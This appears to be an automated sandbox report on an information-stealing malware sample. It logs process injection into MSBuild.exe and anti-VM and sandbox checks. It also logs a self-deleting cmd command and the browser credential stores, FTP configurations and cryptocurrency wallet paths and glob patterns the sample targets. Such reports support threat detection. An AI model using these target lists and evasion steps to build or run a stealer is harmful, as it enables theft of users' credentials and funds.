Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040E886
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: D30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: 2970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: E80000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\SysWOW64\timeout.exe TID: 8972 Thread sleep count: 84 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 2_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 2_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 2_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 2_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040DF8C GetSystemInfo,wsprintfA, 2_2_0040DF8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: Web Data.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: discord.comVMware20,11696494690f
Source: Web Data.9.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Web Data.9.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Web Data.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Web Data.9.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000B28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msedge.exe, 00000009.00000003.1733370302.00007BAC00330000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: Web Data.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Web Data.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Web Data.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Web Data.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Web Data.9.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Web Data.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Web Data.9.dr Binary or memory string: global block list test formVMware20,11696494690
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: msedge.exe, 00000009.00000003.1786821463.00007BAC0242C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware.com/
Source: Web Data.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Web Data.9.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Web Data.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Web Data.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040E886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040D84A lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrcpyA,lstrcatA, 2_2_0040D84A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 2_2_0040F029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 2_2_0040F0CA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41D000
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41F000
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 421000
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 973008
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\qimg4" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_0040DE1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Queries volume information: C:\Users\user\Desktop\x9Lh8czsmo.exe VolumeInformation
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00417652 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 2_2_00417652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00414E31 EntryPoint,GetUserNameW,GetComputerNameW, 2_2_00414E31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 2_2_0040DDBF
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \MultiDoge\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: x9Lh8czsmo.exe, 00000000.00000002.1441635562.0000000004EB0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
